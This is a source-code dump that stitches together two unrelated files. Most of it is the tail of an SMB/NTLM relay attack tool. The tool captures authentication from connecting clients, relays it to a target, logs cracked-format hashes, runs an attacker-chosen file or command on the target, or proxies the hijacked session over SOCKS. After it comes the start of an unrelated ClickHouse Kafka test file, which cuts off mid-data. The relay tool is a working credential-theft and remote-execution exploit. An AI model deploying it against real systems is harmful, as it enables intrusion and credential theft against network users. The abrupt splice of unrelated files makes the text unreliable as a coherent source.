packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception, e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there is no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen, if the target connects back before a previous connection has finished, that we
# get to this function without the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if smbData.has_key(self.target) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
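# (SPNEGO negResult values: 0x00 = accept-completed, 0x01 = accept-incomplete,
# 0x02 = reject; here we ask the client to continue with its NTLM AUTHENTICATE.)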
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now we have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\%s FAILED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here; for now we just grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies the status to return to the connecting client after a successful
# relayed authentication. This is useful when we don't want the connecting
# client to cache the successful credentials in its memory. Valid statuses:
# STATUS_SUCCESS - tells the connecting client that it passed valid credentials,
# which will make it store them accordingly.
# STATUS_ACCESS_DENIED - may occur, for instance, when the client is not a Domain Admin
# and Remote UAC is configured, preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - tells the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
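# Illustrative usage: the value passed here comes from the -s command line switch,
# e.g. setReturnStatus('logon_failure') makes the relay answer the connecting client
# with STATUS_LOGON_FAILURE even though its credentials were already relayed to the target.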
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception, e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print ""
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import avro.schema
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
from . import kafka_pb2
from . import social_pb2
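# A minimal sketch (assumption, inferred from the fields used below) of what the two
# .proto definitions behind the generated kafka_pb2/social_pb2 modules might look like:
#   message KeyValuePair { uint64 key = 1; string value = 2; }   # kafka.proto
#   message User { string username = 1; int32 timestamp = 2; }   # social.proto
# Field numbers and scalar types are illustrative; only the field names
# (key, value, username, timestamp) are taken from the helpers in this file.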
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add a test that SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml', 'configs/kafka_macros.xml'],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
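# Hedged usage sketch for the helper above: how it would be combined with kafka_produce().
# The registry URL is an assumption for illustration; the real tests obtain the client
# from the test cluster setup.
#   client = CachedSchemaRegistryClient('http://localhost:8081')
#   kafka_produce('avro_topic',
#                 [avro_confluent_message(client,
#                                         {'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})])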
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(300)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
